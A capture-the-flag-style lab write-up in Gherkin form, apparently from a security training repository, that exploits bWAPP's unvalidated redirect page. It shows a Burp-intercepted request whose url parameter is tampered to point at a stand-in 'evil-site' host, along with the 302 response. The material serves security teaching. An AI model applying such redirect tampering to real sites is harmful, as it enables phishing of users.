# language: en

Feature: Unvalidated Redirect/Forward-1
  From system bWAPP
  From the A10 - Unvalidated Redirects & Forwads
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given the following
  """
  URL: http://localhost/bWAPP/unvalidated_redir_fwd_1.php
  Message: Unvalidated Redirects & Forwards
  Details:
        - 4 items in selector
        - Select one to be redirected
  Objective: Redirect the request to an unsafe url
  """

Scenario: Dangerous Redirections
Unvalidated redirects and forwards are possible when a web application
accepts untrusted input that could cause the web application to redirect
the request to a URL contained within untrusted input, this kind of
attack can be used craft a dangerous url that could pass the application's
access control check and forward the attacker to privileged functions,
not normally with access.
  Given the selector within it's 4 items
  """
  # unvalidated_redir_fwd_1.php
  <option value="http://itsecgames.blogspot.com">Blog</option>
  <option value="http://www.linkedin.com/in/malikmesellem">LinkedIn</option>
  <option value="http://twitter.com/MME_IT">Twitter</option>
  <option value="http://www.mmeit.be/en">Company website</option>
  """
  When I pick one to see it on Burp to tamper it
  """
  # Burp Original Request
  GET /bWAPP/unvalidated_redir_fwd_1.php?url=http%3A%2F%2Fitsecgames.\
    blogspot.com&form=submit HTTP/1.1
  Host: 192.168.56.101
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://192.168.56.101/bWAPP/unvalidated_redir_fwd_1.php
  ...
  ...

  # Burp Modified Request
  GET /bWAPP/unvalidated_redir_fwd_1.php?url=http://www.evil-site.com&\
  form=submit HTTP/1.1
  Host: 192.168.56.101
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox...
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  ...
  ...

  # Burp Response
  HTTP/1.1 302 Found
  Date: Fri, 13 Jul 2018 18:08:19 GMT
  Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 \
    with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
  X-Powered-By: PHP/5.2.4-2ubuntu5

  # Rendered HTML
  <!DOCTYPE html>
  <html lang="de">
    <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>hacked</title>
    </head>
    <body>
      <p>hacked</p>
    </body>
  </html>
  """
